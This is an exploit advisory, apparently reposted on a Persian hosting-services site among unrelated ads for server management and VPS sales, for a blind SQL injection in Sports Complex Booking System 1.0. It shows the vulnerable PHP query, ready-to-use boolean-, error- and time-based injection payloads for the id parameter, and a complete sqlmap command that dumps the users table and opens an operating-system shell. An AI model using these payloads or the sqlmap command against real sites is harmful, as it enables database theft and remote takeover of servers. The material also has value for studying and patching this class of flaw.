Sports Complex Booking System 1.0 SQL Injection

# Title: Sports Complex Booking System 1.0 Blind SQLi To Rce
# Author: Hejap Zairy
# Date: 24.07.2022
# Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

#vulnerability Code php

سرور شما نیاز به مدیریت و پشتیبانی دارد؟h3>

پیکربندی، مانیتورینگ و نگهداری حرفه‌ای سرورهای لینوکسی و ویندوزی.

پردازش داده و زیرساخت نیاز دارید؟

راه‌اندازی و مدیریت زیرساخت‌های داده و سرور.

مشاوره زیرساخت
مدیریت سرور

“`php
if(isset($_GET[‘id’]) && $_GET[‘id’] > 0){
$qry = $conn->query(“SELECT f.*, c.name as category from `facility_list` f inner join category_list c on f.category_id = c.id where f.id = ‘{$_GET[‘id’]}’ “);
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=stripslashes($v);
}
}
}“`

#Status: CRITICAL
“`
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: p=view_facility&id=4′ AND 1013=1013– aQIm

Type: error-based
Title: MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=view_facility&id=4′ OR (SELECT 7626 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7626=7626,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– SkTl

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=view_facility&id=4′ AND (SELECT 5013 FROM (SELECT(SLEEP(5)))lCeY)– pdUo

“`
#Blind SQLi Time to Rce
#ُExploit

sqlmap -u ‘http://0day.gov/scbs/?p=view_facility&id=4’ –hex –time-sec=17 –dbms=mysql –technique=t –random-agent –eta -p id -D scbs -T users –dump –os-shell

# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc

# Proof and Exploit:
https://i.imgur.com/nY9GR9F.png

نیاز به سرور پایدار دارید؟

ارائه VPS ایران و خارج با منابع اختصاصی.

خرید VPS

نوشته های مشابه

CVE-2026-5513 – Online Scheduling and Appointment Booking System – Bookly

CVE-2026-11624 – Model Context Protocol DNS Rebinding Vulnerability

CVE-2026-1291 – Meow Gallery

CVE-2026-9629 – Canvas